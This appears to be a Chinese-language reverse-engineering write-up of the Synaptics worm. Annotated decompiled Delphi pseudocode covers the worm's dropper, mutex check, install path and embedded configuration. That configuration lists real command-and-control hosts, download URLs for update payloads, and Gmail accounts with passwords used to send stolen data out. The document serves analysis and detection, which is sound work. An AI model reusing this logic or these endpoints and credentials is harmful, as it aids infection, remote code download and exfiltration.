Synaptics 蠕蟲病毒分析
- Synaptics 蠕蟲病毒分析
- 檔案資訊
- 資源檔案
- 執行流程
- TFormVir_FormCreate
- ControlCenter_49A3E0
- 1、釋放EXERESX並執行 ==》exec_exeres_477AD8
- 2、InjUpdate
- 3、程式已經執行則結束程序
- 4、初始化
- 4.1 Synaptics目錄
- 4.2 服務端配置
- 4.3 判斷程式是否在Synaptics目錄下
- 5、不在Synaptics目錄下時
- 5、在Synaptics目錄下時
- 5.1 感染特定目錄 inj_SpecialFolder_49834C
- 5.2 自動更新 Auto_Update_498270
- 5.3 tcp_client 命令獲取、執行
- 5.4 USB_Hooks
- 5.5 Directory_Watcher
- 5.6 鍵盤記錄 Keyboard_hook
- 5.7 郵件傳送 Auto_Mail_Sender_4974E4
- TFormVir_FormClose
- 處置
檔案資訊
Synaptics 蠕蟲病毒19年出現,至今仍有感染的情況0.0
作業系統: Windows(95)[I386, 32 位, GUI]
編譯器: Borland Delphi(7)[Enterprise]
語言: Object Pascal(Delphi)
VS_VERSION_INFO.StringFileInfo.041F04E6.CompanyName:Synaptics
VS_VERSION_INFO.StringFileInfo.041F04E6.FileDescription:Synaptics Pointing Device Driver
VS_VERSION_INFO.StringFileInfo.041F04E6.FileVersion:1.0.0.4
VS_VERSION_INFO.StringFileInfo.041F04E6.InternalName:
VS_VERSION_INFO.StringFileInfo.041F04E6.LegalCopyright:
VS_VERSION_INFO.StringFileInfo.041F04E6.LegalTrademarks:
VS_VERSION_INFO.StringFileInfo.041F04E6.OriginalFilename:
VS_VERSION_INFO.StringFileInfo.041F04E6.ProductName:Synaptics Pointing Device Driver
VS_VERSION_INFO.StringFileInfo.041F04E6.ProductVersion:1.0.0.0
VS_VERSION_INFO.StringFileInfo.041F04E6.Comments:
字串中包含土耳其語
資源檔案
執行流程
該病毒為delphi程式,入口為TFormVir 視窗,響應FormCreate和FormClose
TFormVir_FormCreate
隱藏視窗工作列圖示：透過設定 WS_EX_TOOLWINDOW 擴充套件樣式，使視窗不會在工作列顯示。
/// OnCreate handler of the worm's main form (the program entry point per the
/// analysis above). Hides the window from the taskbar by OR-ing
/// WS_EX_TOOLWINDOW into the extended style of the window handle read from
/// the global Application object, then hands control to ControlCenter_49A3E0
/// with flag 1 ("Aktif" = enable all components).
/// Returns whatever ControlCenter_49A3E0 returns.
int __fastcall TFormVir_FormCreate(Controls::TWinControl *this)
{
HWND v2; // esi
LONG WindowLongA; // eax
// NOTE(review): byte at Application+0x5B is unnamed here; presumably TApplication.ShowMainForm — verify
*(_BYTE *)(*Application[0] + 0x5B) = 0;
// Application+0x30 is used as the HWND passed to Get/SetWindowLongA below
v2 = *(HWND *)(*Application[0] + 0x30);
// 0xFFFFFFEC == -20 == GWL_EXSTYLE
WindowLongA = user32_GetWindowLongA(v2, 0xFFFFFFEC);
// tool windows get no taskbar button: the form stays invisible to the user
user32_SetWindowLongA(v2, 0xFFFFFFEC, WindowLongA | WS_EX_TOOLWINDOW);
return ControlCenter_49A3E0(this, 1);
}
ControlCenter_49A3E0
主邏輯
/// Main control logic of the worm.
/// flag_ControlCenter != 0 ("Aktif"): full start-up path — drop and run the
///   embedded host program (EXERESX), handle the "InjUpdate" relaunch
///   argument, enforce single instance via the mutex, initialise paths and
///   server config, then either relaunch from the Synaptics directory or
///   start all components.
/// flag_ControlCenter == 0 ("Pasif"): disable every component
///   (handle_49A098 with all flags 0); used before self-update.
/// Returns the result of LStrArrayClr (Delphi string cleanup), i.e. nothing
/// meaningful to callers.
int __fastcall ControlCenter_49A3E0(Controls::TWinControl *this, char flag_ControlCenter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v25 = 0;
v24 = 0;
v23 = v2;
v22 = v3;
v21 = &savedregs;
// Delphi try/finally frame: push an SEH record on fs:[0], popped at the end
v20[1] = (unsigned int)&loc_49A5EF;
v20[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v20);
if ( flag_ControlCenter )
{// program start, called from FormCreate when the window is created
str_add_4967D4((int)this, (int)"ControlCenter -> Aktif");
// lazily create a TApplicationEvents object (stored at dword index 0xC2)
// and hook its OnException so unhandled exceptions do not show a dialog
if ( !*((_DWORD *)this + 0xC2) )
*((_DWORD *)this + 0xC2) = TCustomApplicationEvents_Create(VMT_45BCE8_TApplicationEvents, 1, this);
v5 = *((_DWORD *)this + 0xC2);
*(_DWORD *)(v5 + 0x44) = this;
*(_DWORD *)(v5 + 0x40) = TFormVir_AppEventsException;
v18 = (void *)isadmin_by_CheckSCManagerAccess_4738BC(0);
Handle = (void *)TWinControl_GetHandle(this);
// drop the EXERESX RCDATA resource (the original, infected host program)
// to disk and run it; byte_49F149 records whether that resource existed
byte_49F149 = exec_exeres_477AD8(ptr_EXERESX_49D6B8, Handle, v18);
ParamStr(1, &v27);
// decompiler artefact: v7 is the equality result of this LStrCmp
LStrCmp(v27, "InjUpdate");
if ( v7 )
{
// relaunched with "InjUpdate": while the instance mutex (Mutex_name_49D6B4,
// "Synaptics2X" per the analysis) can still be opened, another copy is
// running. 0x1F0001 == MUTEX_ALL_ACCESS.
v8 = (const CHAR *)LStrToPChar(Mutex_name_49D6B4[0]);
v9 = kernel32_OpenMutexA(0x1F0001u, 0, v8);
while ( v9 )
{
kernel32_CloseHandle_0(v9);
v10 = (const CHAR *)LStrToPChar(Mutex_name_49D6B4[0]);
v9 = kernel32_OpenMutexA(0x1F0001u, 0, v10);
// if <TempPath>\<own file name> exists, the old Synaptics.exe is killed
// so the updated copy can take over
Get_TempPath_4737B0((int)&v26);
ParamStr(0, &v24);
ExtractFileName(v24);
LStrCat((int)&v26, v25);
if ( FileExists(v26) )
find_and_TerminateProcess_475A94((int)"Synaptics.exe");
}
}
// single-instance check via the same mutex: a second copy terminates itself
if ( (unsigned __int8)IsProgramAlreadyRunning_47423C((int)Mutex_name_49D6B4[0], 1) )
{
TApplication_Terminate(*(Forms::TApplication **)Application[0]);
}
else
{
// resolve the install directory (registry / ProgramData) and parse the
// embedded SYSADRESS configuration
init_Synaptics_path_498684((int)this);
init_sysadress_498F04(this);
if ( (unsigned __int8)not_under_Synaptics_appdir_498B40((int)this) )
{
// not yet running from the Synaptics directory: the callee already
// installed a copy there; relaunch it with the "InjUpdate" argument
exec_InjUpdate_498998(this);
}
else
{
// running from the install directory: read the component flags from the
// parsed config; every flag defaults to true when the string is unparsable
v19 = StrToBoolDef(flag_TCP_Client_49F1B0, 1);
v17 = StrToBoolDef(flag_useb_hook_49F1B4, 1);
v16 = StrToBoolDef(flag_Directory_Watcher_49F1B8, 1);
v15 = StrToBoolDef(flag_Keyboar_Hook_49F1BC, 1);
v14 = StrToBoolDef(flag_Auto_Mail_Sender_49F1C0, 1);
v13 = StrToBoolDef(flag_Auto_Update_49F1A8, 1);
v11 = StrToBoolDef(flag_inj_spec_exe_and_excel_49F1A4, 1);
// handle_49A098(this, inj_spec_exe_and_excel, auto_update, tcp_client,
//               usb_hook, directory_watcher, keyboard_hook, auto_mail)
handle_49A098(this, v11, v13, v19, v17, v16, v15, v14);
sub_499FAC(this, 1);
}
}
}
else
{
// "Pasif": switch every component off (used right before self-update)
str_add_4967D4((int)this, (int)"ControlCenter -> Pasif");
handle_49A098(this, 0, 0, 0, 0, 0, 0, 0);
}
__writefsdword(0, v20[0]);
v21 = (int *)&loc_49A5F6;
return LStrArrayClr(&v24, 4);
}
1、釋放EXERESX並執行 ==》exec_exeres_477AD8
1、確保 EXERESX 資源已釋放到當前目錄下，檔名為 ._cache_ 加上原檔名
2、執行釋放的檔案(被感染的原始檔案)
/// Drops the RCDATA resource `res_name` (EXERESX = the original host program
/// that was infected) to "<current dir>\._cache_<own exe name>" and runs it
/// through exec_473490 (ShellExecuteExA).
/// a2 is the owner HWND; a3 is the is-admin flag forwarded as the "runas"
/// selector on non-XP systems.
/// Returns 1 when the resource exists in this binary (and was executed),
/// 0 when it does not (the binary is the bare worm, not an infected host).
/// Detection note: a hidden+system "._cache_<name>.exe" next to a binary is
/// the extracted host program left behind by this routine.
char __fastcall exec_exeres_477AD8(void *res_name, void *a2, void *a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v30 = _InterlockedExchange((volatile __int32 *)&res_name1, (__int32)a3);
hwnd = (HWND)a2;
res_name1 = res_name;
LStrAddRef(res_name);
v19 = &savedregs;
v18[1] = (unsigned int)&loc_477DAE;
v18[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v18);
v5 = (const CHAR *)LStrToPChar(res_name1);
// resource type 0xA == RT_RCDATA
if ( kernel32_FindResourceA(hmodule, v5, (LPCSTR)0xA) )
{
v29 = 1;
GetCurrentDir(&v26);
v17 = v26;
ParamStr(0, v25);
ExtractFileName(v25[0]);
// LStrCatN arguments appear reversed in decompiler output:
// lpFile = <current dir> + "\" + "._cache_" + <own exe name>
LStrCatN(&lpFile, 4, v25[1], "._cache_", "\\", v17);
v16 = &savedregs;
v15 = &loc_477D03;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
if ( FileExists((int)lpFile) )
{
// the ._cache_<name> file already exists
if ( (unsigned __int8)find_RCDATA_474C10(lpFile, res_name1) )
{
// the resource is present: clear attributes so DeleteFile succeeds,
// delete the stale cache file and re-extract it below
FileSetAttr((const int)lpFile, FILE_ATTRIBUTE_NORMAL);
DeleteFile(lpFile);
LStrFromPChar(&v23, v5);
LOBYTE(v7) = 1;
v28 = (Classes::TCustomMemoryStream *)TResourceStream_Create(
(Classes::TResourceStream *)VMT_418FFC_TResourceStream,
v7,
hmodule,
v23,
0xA);
v13 = &savedregs;
v12 = &loc_477CA2;
v11 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v11);
// re-extract the resource over ._cache_<name>
TCustomMemoryStream_SaveToFile(v28, (unsigned __int16)lpFile);
__writefsdword(0, (unsigned int)v11);
TObject_Free(v28);
}
}
else
{
// first run: extract the resource to ._cache_<name>
LStrFromPChar(&v24, v5);
LOBYTE(v6) = 1;
v28 = (Classes::TCustomMemoryStream *)TResourceStream_Create(
(Classes::TResourceStream *)VMT_418FFC_TResourceStream,
v6,
hmodule,
v24,
0xA);
v13 = &savedregs;
v12 = &loc_477BD6;
v11 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v11);
TCustomMemoryStream_SaveToFile(v28, (unsigned __int16)lpFile);
__writefsdword(0, (unsigned int)v11);
TObject_Free(v28);
}
__writefsdword(0, (unsigned int)ExceptionList);
v16 = &savedregs;
v15 = &loc_477D81;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
// 6 == FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM: hide the dropped file
FileSetAttr((const int)lpFile, 6u);
get_win_ver_472EF0((int)&v22);
// launch ._cache_<name> via exec_473490 (ShellExecuteExA); v9 is the
// decompiler's view of the LStrCmp equality result
v8 = LStrCmp(v22, "XP");
if ( v9 )
{
// Windows XP: no elevation requested, no wait
v13 = 0;
v12 = 0;
build_Parameters_47475C((int *)&lpParameters_1, (int)v5, v3, v4);
exec_473490(hwnd, lpFile, lpParameters_1, (char)v13, (char)v12);
}
else
{
// later Windows: the is-admin flag (a3, saved in v30) selects "runas"
LOBYTE(v8) = v30;
v13 = (int *)v8;
v12 = 0;
build_Parameters_47475C((int *)&lpParameters, (int)v5, v3, v4);
exec_473490(hwnd, lpFile, lpParameters, (char)v13, (char)v12);
}
__writefsdword(0, (unsigned int)ExceptionList);
}
else
{
// no EXERESX resource: this binary is the bare worm
v29 = 0;
}
__writefsdword(0, v18[0]);
v19 = (int *)&loc_477DB5;
LStrArrayClr(&lpParameters_1, 0xF);
LStrClr(&res_name1);
return v29;
}
ShellExecuteExA執行釋放的檔案(原被感染的程式)
/// Thin wrapper around ShellExecuteExA used for every process launch in the
/// worm (host program, self-relaunch with "InjUpdate", downloaded update).
/// hwnd: owner window; lpFile/lpParameters_1: Delphi AnsiStrings;
/// isadmin != 0 selects the "runas" verb (triggers a UAC prompt on Vista+);
/// wait != 0 polls the child every 50 ms until it exits.
/// Returns the child process handle, or 0 if ShellExecuteExA failed.
HANDLE __fastcall exec_473490(HWND hwnd, void *lpFile, void *lpParameters_1, char isadmin, char wait)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
lpParameters = lpParameters_1;
lpFile1 = lpFile;
LStrAddRef(lpFile);
LStrAddRef(lpParameters);
v9 = &savedregs;
v8[1] = (unsigned int)&loc_473564;
v8[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v8);
// 0x3C == sizeof(SHELLEXECUTEINFOA) on 32-bit
FillChar(&ExecInfo, 0x3C, 0);
ExecInfo.cbSize = 0x3C;
ExecInfo.hwnd = hwnd;
// 0x440 == SEE_MASK_NOCLOSEPROCESS (0x40) | SEE_MASK_FLAG_NO_UI (0x400):
// keep hProcess for the wait below and suppress error dialogs
ExecInfo.fMask = 0x440;
ExecInfo.lpFile = (LPCSTR)LStrToPChar(lpFile1);
if ( isadmin )
ExecInfo.lpVerb = "runas";
if ( lpParameters )
ExecInfo.lpParameters = (LPCSTR)LStrToPChar(lpParameters);
// nShow 1 == SW_SHOWNORMAL
ExecInfo.nShow = 1;
if ( shell32_ShellExecuteExA(&ExecInfo) )
{
if ( wait && ExecInfo.hProcess )
{
// busy-wait in 50 ms (0x32) steps until the child signals
while ( kernel32_WaitForSingleObject(ExecInfo.hProcess, 0x32u) == WAIT_TIMEOUT )
kernel32_Sleep_0(0x32u);
}
hProcess = ExecInfo.hProcess;
}
else
{
hProcess = 0;
}
__writefsdword(0, v8[0]);
v9 = (int *)&loc_47356B;
LStrArrayClr(&lpParameters, 2);
return hProcess;
}
2、InjUpdate
當帶有執行引數 InjUpdate 時，嘗試開啟互斥量 Synaptics2X（即已存在病毒程序時），判斷 TempPath 下是否存在同名程式；存在時查詢並結束 Synaptics.exe
3、程式已經執行則結束程序
透過互斥量Synaptics2X判斷是否已經存在病毒程序,存在時結束本程序
4、初始化
4.1 Synaptics目錄
- 登錄檔存在
存在 HKEY_LOCAL_MACHINE（管理員時）或 HKEY_CURRENT_USER 下的 Software\Synaptics\APPDir 時，讀取其值作為目錄
- 登錄檔不存在時C:\ProgramData\Synaptics
/// Resolves the worm's install directory and derived file names, and reads
/// the embedded version number.
/// Sets globals: flag_APPIsAdmin_49F148, I_EXEVSNX_49F14C / s_EXEVSNX_49F1C8
/// (integer version stored in the EXEVSNX RCDATA resource),
/// Synaptics_appdir_49F144, ptr_Synaptics_49D6A8 (dir name),
/// ptr_Synaptics_exe_49D6AC (<name>.exe), ptr_Synaptics_dll_49D6B0 (<name>.dll).
/// a1 is the form used as log sink for str_add_4967D4.
/// Returns the LStrArrayClr result (string cleanup), not meaningful.
int __fastcall init_Synaptics_path_498684(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v4[1] = &loc_49889C;
v4[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v4);
flag_APPIsAdmin_49F148 = isadmin_by_CheckSCManagerAccess_4738BC(0);
// EXEVSNX resource holds the worm's version as a decimal string
get_rcdata_4747D8(ptr_EXEVSNX_49D6BC, &System__AnsiString);
I_EXEVSNX_49F14C = StrToInt(System__AnsiString);
IntToStr(I_EXEVSNX_49F14C, &v14);
LStrAsg(&s_EXEVSNX_49F1C8, v14);
// registry value Software\Synaptics\APPDir, under HKEY_LOCAL_MACHINE when
// running as admin, otherwise under HKEY_CURRENT_USER
reg_readstring_4736A4(flag_APPIsAdmin_49F148, "Synaptics", "APPDir", &v16);
if ( v16 && DirectoryExists(v16) )
{
// existing install: take dir from the registry and derive the names
LStrAsg(&Synaptics_appdir_49F144, v16);
ExtractFileName(v16);
LStrAsg(&ptr_Synaptics_49D6A8, v13[1]);
LStrCat3(&ptr_Synaptics_exe_49D6AC, ptr_Synaptics_49D6A8, ".exe");
LStrCat3(&ptr_Synaptics_dll_49D6B0, ptr_Synaptics_49D6A8, ".dll");
}
else
{
// no registry value: <SystemDirectory>\Synaptics on XP (v2 = LStrCmp result),
// otherwise <CSIDL_COMMON_APPDATA>\Synaptics, i.e. C:\ProgramData\Synaptics
get_win_ver_472EF0(v13);
LStrCmp(v13[0], "XP");
if ( v2 )
{
Get_SystemDirectory_4737D8();
LStrCatN(&Synaptics_appdir_49F144, 3, ptr_Synaptics_49D6A8, "\\", v12[1]);
}
else
{
// CSIDL_COMMON_APPDATA
Get_SpecialFolder_4730FC(3, v12);
LStrCatN(&Synaptics_appdir_49F144, 3, ptr_Synaptics_49D6A8, "\\", v12[0]);
}
}
// log the resolved values
LStrCat3(&v11, "APPDir -> ", Synaptics_appdir_49F144);
str_add_4967D4(a1, v11);
LStrCat3(&v10, "APPDirName -> ", ptr_Synaptics_49D6A8);
str_add_4967D4(a1, v10);
LStrCat3(&v9, "APPFileName -> ", ptr_Synaptics_exe_49D6AC);
str_add_4967D4(a1, v9);
LStrCat3(&v8, "APPKBDDLLName -> ", ptr_Synaptics_dll_49D6B0);
str_add_4967D4(a1, v8);
BoolToStr(flag_APPIsAdmin_49F148, 0, &v6);
LStrCat3(&v7, "APPIsAdmin -> ", v6);
str_add_4967D4(a1, v7);
LStrCat3(&v5, "ExeInj Version -> ", s_EXEVSNX_49F1C8);
str_add_4967D4(a1, v5);
__writefsdword(0, v4[0]);
v4[2] = &loc_4988A3;
return LStrArrayClr(&v5, 0xE);
}
4.2 服務端配置
init_sysadress_498F04
/// Loads the embedded server configuration from the SYSADRESS RCDATA
/// resource into the SERVER_ips_49F150 string array.
/// Flow: read resource -> transform via sub_494A8C (0x1927) -> drop the last
/// line -> parse as INI (TMemIniFile) -> read each key with sub_4758E8 which
/// supplies the hard-coded default when the key is missing -> second pass
/// re-applies defaults to the numeric/boolean entries (sub_4758B0).
/// The hard-coded defaults (xred.mooo.com, the afraid.org dyndns API URL,
/// the Google Docs / Dropbox / xred.site50.net download URLs, the Gmail
/// accounts) are the network and exfiltration IoCs of this sample.
/// Index map of SERVER_ips_49F150 as written below:
///   +0..+2 IP1..IP3, +3 PORT, +4 CTIME, +5 CTIMEOUT,
///   +6..+8 EXEURL1..3, +9..+0xB INIURL1..3, +0xF..+0x11 SSLURL1..3,
///   +0x12 USERNAME, +0x13 PASSWORD, +0x14 SENDMAIL,
///   +0x15..+0x1D ACTIVE flags/times, +0x1F..+0x21 CLIENT flags.
/// Returns the LStrArrayClr result (string cleanup), not meaningful.
int __fastcall init_sysadress_498F04(void *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v12 = &loc_49981C;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
v10 = &savedregs;
v9 = &loc_4997F4;
v8 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &v8);
// in-memory INI; "cachex.ini" is only the object's FileName, nothing is read from disk here
v1 = TMemIniFile_Create(VMT_42FFF8_TMemIniFile, 1, "cachex.ini");
LOBYTE(v2) = 1;
v77 = TObject_Create(VMT_418BE4_TStringList, v2);
// raw config text from the SYSADRESS resource
get_rcdata_4747D8("SYSADRESS", &v76);
// SetTextStr
(*(*v77 + 0x2C))(v77, v76, *v77);
// TStrings.GetTextStr
(*(*v77 + 0x1C))(v77, &v74);
// NOTE(review): sub_494A8C with constant 0x1927 is presumably a decode
// step for the embedded config — not analysed on this page
LOWORD(v3) = 0x1927;
sub_494A8C(v74, v3, &v75);
// SetTextStr
(*(*v77 + 0x2C))(v77, v75);
// TStringList.GetCount
v4 = (*(*v77 + 0x14))(v77);
// TStringList.Delete — drops the last line of the decoded text
(*(*v77 + 0x48))(v77, v4 - 1);
TMemIniFile_SetStrings(v1, v77);
// pattern repeated for every key: ReadString(section, key, default=0) then
// sub_4758E8(value, fallback, out) — fallback used when value is empty
// (inferred from the second pass below; verify sub_4758E8)
v8 = 0;
v7 = &v72;
// TMemIniFile.ReadString
(**v1)(v1, "SERVER", "IP1", 0, &v72);
sub_4758E8(v72, "xred.mooo.com", &v73);
LStrAsg(&SERVER_ips_49F150, v73);
v8 = 0;
v7 = &v70;
// IP2 default is a dyndns API URL; re_httpget_tcpclient_495930 resolves
// hosts containing "afraid.org/api" through an HTTP GET
(**v1)(v1, "SERVER", "IP2", 0, &v70);
sub_4758E8(v70, "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", &v71);
LStrAsg(&SERVER_ips_49F150 + 1, v71);
v8 = 0;
v7 = &v68;
(**v1)(v1, "SERVER", "IP3", 0, &v68);
sub_4758E8(v68, "xred.mooo.com", &v69);
LStrAsg(&SERVER_ips_49F150 + 2, v69);
v8 = 0;
v7 = &v66;
// TCP C2 port (default 1199), connect interval and timeout in seconds
(**v1)(v1, "SERVER", "PORT", 0, &v66);
sub_4758E8(v66, "1199", &v67);
LStrAsg(&SERVER_ips_49F150 + 3, v67);
v8 = 0;
v7 = &v64;
(**v1)(v1, "SERVER", "CTIME", 0, &v64);
sub_4758E8(v64, "600", &v65);
LStrAsg(&SERVER_ips_49F150 + 4, v65);
v8 = 0;
v7 = &v62;
(**v1)(v1, "SERVER", "CTIMEOUT", 0, &v62);
sub_4758E8(v62, "10", &v63);
LStrAsg(&SERVER_ips_49F150 + 5, v63);
v8 = 0;
v7 = &v60;
// [DOWNLOAD] update-INI locations tried in order by thread_InjUpdate_497CF0
(**v1)(v1, "DOWNLOAD", "INIURL1", 0, &v60);
sub_4758E8(v60, "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", &v61);
LStrAsg(&SERVER_ips_49F150 + 9, v61);
v8 = 0;
v7 = &v58;
(**v1)(v1, "DOWNLOAD", "INIURL2", 0, &v58);
sub_4758E8(v58, "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", &v59);
LStrAsg(&SERVER_ips_49F150 + 0xA, v59);
v8 = 0;
v7 = &v56;
(**v1)(v1, "DOWNLOAD", "INIURL3", 0, &v56);
sub_4758E8(v56, "http://xred.site50.net/syn/SUpdate.ini", &v57);
LStrAsg(&SERVER_ips_49F150 + 0xB, v57);
v8 = 0;
v7 = &v54;
// new-version binary locations
(**v1)(v1, "DOWNLOAD", "EXEURL1", 0, &v54);
sub_4758E8(v54, "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", &v55);
LStrAsg(&SERVER_ips_49F150 + 6, v55);
v8 = 0;
v7 = &v52;
(**v1)(v1, "DOWNLOAD", "EXEURL2", 0, &v52);
sub_4758E8(v52, "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", &v53);
LStrAsg(&SERVER_ips_49F150 + 7, v53);
v8 = 0;
v7 = &v50;
(**v1)(v1, "DOWNLOAD", "EXEURL3", 0, &v50);
sub_4758E8(v50, "http://xred.site50.net/syn/Synaptics.rar", &v51);
LStrAsg(&SERVER_ips_49F150 + 8, v51);
v8 = 0;
v7 = &v48;
// SSL library download locations (SSLLibrary.dll)
(**v1)(v1, "DOWNLOAD", "SSLURL1", 0, &v48);
sub_4758E8(v48, "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", &v49);
LStrAsg(&SERVER_ips_49F150 + 0xF, v49);
v8 = 0;
v7 = &v46;
(**v1)(v1, "DOWNLOAD", "SSLURL2", 0, &v46);
sub_4758E8(v46, "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", &v47);
LStrAsg(&SERVER_ips_49F150 + 0x10, v47);
v8 = 0;
v7 = &v44;
(**v1)(v1, "DOWNLOAD", "SSLURL3", 0, &v44);
sub_4758E8(v44, "http://xred.site50.net/syn/SSLLibrary.dll", &v45);
LStrAsg(&SERVER_ips_49F150 + 0x11, v45);
v8 = 0;
v7 = &v42;
// [GMAIL] credentials used by the mail sender component (exfiltration channel)
(**v1)(v1, "GMAIL", "USERNAME", 0, &v42);
sub_4758E8(v42, "xredline2@gmail.com;xredline3@gmail.com", &v43);
LStrAsg(&SERVER_ips_49F150 + 0x12, v43);
v8 = 0;
v7 = &v40;
(**v1)(v1, "GMAIL", "PASSWORD", 0, &v40);
sub_4758E8(v40, "xredline2**x;xredline3**x", &v41);
LStrAsg(&SERVER_ips_49F150 + 0x13, v41);
v8 = 0;
v7 = &v38;
(**v1)(v1, "GMAIL", "SENDMAIL", 0, &v38);
sub_4758E8(v38, "xredline1@gmail.com", &v39);
LStrAsg(&SERVER_ips_49F150 + 0x14, v39);
v8 = 0;
v7 = &v36;
// [ACTIVE] component switches ("-1" == Delphi True) and timer intervals
(**v1)(v1, "ACTIVE", "FIRSTINJ", 0, &v36);
sub_4758E8(v36, "-1", &v37);
LStrAsg(&SERVER_ips_49F150 + 0x15, v37);
v8 = 0;
v7 = &v34;
(**v1)(v1, "ACTIVE", "AUTOUPDATE", 0, &v34);
sub_4758E8(v34, "-1", &v35);
LStrAsg(&SERVER_ips_49F150 + 0x16, v35);
v8 = 0;
v7 = &v32;
(**v1)(v1, "ACTIVE", "AUTOUPDATETIME", 0, &v32);
sub_4758E8(v32, "3600", &v33);
LStrAsg(&SERVER_ips_49F150 + 0x17, v33);
v8 = 0;
v7 = &v30;
(**v1)(v1, "ACTIVE", "CLIENT", 0, &v30);
sub_4758E8(v30, "-1", &v31);
LStrAsg(&SERVER_ips_49F150 + 0x18, v31);
v8 = 0;
v7 = &v28;
(**v1)(v1, "ACTIVE", "USBHOOK", 0, &v28);
sub_4758E8(v28, "-1", &v29);
LStrAsg(&SERVER_ips_49F150 + 0x19, v29);
v8 = 0;
v7 = &v26;
(**v1)(v1, "ACTIVE", "DIRWATCHER", 0, &v26);
sub_4758E8(v26, "-1", &v27);
LStrAsg(&SERVER_ips_49F150 + 0x1A, v27);
v8 = 0;
v7 = &v24;
(**v1)(v1, "ACTIVE", "KEYBOARDHOOK", 0, &v24);
sub_4758E8(v24, "-1", &v25);
LStrAsg(&SERVER_ips_49F150 + 0x1B, v25);
v8 = 0;
v7 = &v22;
(**v1)(v1, "ACTIVE", "AUTOMAIL", 0, &v22);
sub_4758E8(v22, "-1", &v23);
LStrAsg(&SERVER_ips_49F150 + 0x1C, v23);
v8 = 0;
v7 = &v20;
(**v1)(v1, "ACTIVE", "AUTOMAILTIME", 0, &v20);
sub_4758E8(v20, "1800", &v21);
LStrAsg(&SERVER_ips_49F150 + 0x1D, v21);
v8 = 0;
v7 = &v18;
// [CLIENT] infection behaviour switches
(**v1)(v1, "CLIENT", "AUTORUNINJ", 0, &v18);
sub_4758E8(v18, "0", &v19);
LStrAsg(&SERVER_ips_49F150 + 0x1F, v19);
v8 = 0;
v7 = &v16;
(**v1)(v1, "CLIENT", "EXEINJ", 0, &v16);
sub_4758E8(v16, "-1", &v17);
LStrAsg(&SERVER_ips_49F150 + 0x20, v17);
v8 = 0;
v7 = &v14;
(**v1)(v1, "CLIENT", "EXELINJ", 0, &v14);
sub_4758E8(v14, "-1", &v15);
LStrAsg(&SERVER_ips_49F150 + 0x21, v15);
TObject_Free(v77);
TObject_Free(v1);
v8 = &savedregs;
v7 = &loc_4997E0;
v6 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &v6);
// second pass: sub_4758B0 appears to validate the numeric/boolean entries;
// anything that fails is reset to the same default as above
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 3)) )
LStrAsg(&SERVER_ips_49F150 + 3, "1199");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 4)) )
LStrAsg(&SERVER_ips_49F150 + 4, "600");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 5)) )
LStrAsg(&SERVER_ips_49F150 + 5, "10");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x15)) )
LStrAsg(&SERVER_ips_49F150 + 0x15, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x16)) )
LStrAsg(&SERVER_ips_49F150 + 0x16, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x17)) )
LStrAsg(&SERVER_ips_49F150 + 0x17, "3600");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x18)) )
LStrAsg(&SERVER_ips_49F150 + 0x18, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x19)) )
LStrAsg(&SERVER_ips_49F150 + 0x19, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1A)) )
LStrAsg(&SERVER_ips_49F150 + 0x1A, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1B)) )
LStrAsg(&SERVER_ips_49F150 + 0x1B, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1C)) )
LStrAsg(&SERVER_ips_49F150 + 0x1C, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1D)) )
LStrAsg(&SERVER_ips_49F150 + 0x1D, "1800");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x1F)) )
LStrAsg(&SERVER_ips_49F150 + 0x1F, "0");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x20)) )
LStrAsg(&SERVER_ips_49F150 + 0x20, "-1");
if ( !sub_4758B0(*(&SERVER_ips_49F150 + 0x21)) )
LStrAsg(&SERVER_ips_49F150 + 0x21, "-1");
